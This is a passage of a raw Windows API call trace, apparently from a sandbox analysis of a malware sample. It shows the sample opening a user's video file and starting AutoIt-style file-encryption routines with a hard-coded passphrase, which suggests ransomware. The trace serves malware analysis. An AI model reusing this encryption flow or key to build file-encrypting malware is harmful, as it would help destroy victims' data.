Flags=0x0, Size=0x20002) returned 0x4506008 [0105.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0105.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0105.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0105.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0105.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0105.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0105.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0105.693] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\jgIUi-yVs0307RW IcX.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\jgiui-yvs0307rw icx.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0105.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0105.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0105.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0105.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0105.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0105.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0105.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0105.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0105.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0105.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0105.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0105.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d3920 [0105.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0105.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0105.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0105.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0105.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0105.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0105.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0105.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0105.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0105.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0105.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0105.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0105.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0105.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0105.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0105.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0105.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0105.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0105.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0105.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0105.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0105.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0105.696] FreeLibrary (hLibModule=0x772d0000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0105.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0105.697] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0105.697] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.698] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0105.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d3920 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0105.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0105.700] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0105.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43caa48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0105.700] CloseHandle (hObject=0x258) returned 1 [0105.700] FreeLibrary (hLibModule=0x772d0000) returned 1 [0105.700] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0105.700] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\jgIUi-yVs0307RW IcX.mkv", lpFindFileData=0x144e3c8 | out: lpFindFileData=0x144e3c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b76150, ftCreationTime.dwHighDateTime=0x1d5ec8d, ftLastAccessTime.dwLowDateTime=0x60d86c30, ftLastAccessTime.dwHighDateTime=0x1d5e5c2, ftLastWriteTime.dwLowDateTime=0x60d86c30, ftLastWriteTime.dwHighDateTime=0x1d5e5c2, nFileSizeHigh=0x0, nFileSizeLow=0x3394, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="jgIUi-yVs0307RW IcX.mkv", cAlternateFileName="JGIUI-~1.MKV")) returned 0x41ac700 [0105.701] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0105.701] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0105.701] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.701] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0105.701] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.701] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0105.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0105.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0105.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0105.701] CryptAcquireContextA (in: phProv=0x144e0a8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e0a8*=0x41a5250) returned 1 [0105.702] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0105.702] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0105.702] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0105.702] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0105.702] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.702] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0105.702] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.702] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0105.702] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0105.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cb018, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0105.702] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144de18 | out: phHash=0x144de18) returned 1 [0105.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0105.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0105.744] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0105.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0105.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0105.744] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: 